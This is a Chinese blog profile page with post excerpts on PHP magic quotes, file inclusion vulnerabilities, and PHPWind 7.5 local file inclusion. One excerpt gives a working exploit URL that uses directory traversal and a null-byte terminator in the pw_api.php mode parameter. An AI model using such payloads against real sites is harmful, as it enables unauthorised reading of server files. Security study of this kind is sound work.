自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(3)
  • 资源 (1)
  • 收藏
  • 关注

原创 魔术符号

 什么是魔术引号当打开时,所有的 (单引号),"(双引号),/(反斜线)和 NULL 字符都会被自动加上一个反斜线进行转义。这和 addslashes() 作用完全相同。一共有三个魔术引号指令:magic_quotes_gpc 影响到 HTTP 请求数据(GET,POST 和 COOKIE)。不能在运行时改变。在 PHP 中默认值为 on。 参见 get_magic_quot

2010-02-23 17:49:00 1150

原创 文件包含漏洞

1、如果类似于如下:require_once(R_P.api/class_ . $mode . .php);并且$mode可来源于用户的输入,如$_GET, $_REQUEST, $_POST等,且没有对这个输入进行检查和过滤,则存在文件包含漏洞。对文件路径作了一些限制,这样,不能用http://.../a.php之类的作为$mode的参数值,因此只存在本地文件包含漏洞。

2010-02-23 17:35:00 455

原创 PHPWind7.5多个文件包含漏洞的exploit

尝试发送以下URL,能实现本地文件包含渗透。http://10.20.61.88/phpWind7.5/pw_api.php?type=uc&sig=8c6e45dcfae660037c05f0cd1a15695b&mode=../../../../../../../../test.txt%00http://10.20.61.88/phpWind7.5/pw_api.php?type=uc

2010-02-23 17:27:00 2000

协议分析代码

这是一个简单的协议分析工具

2007-12-04

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除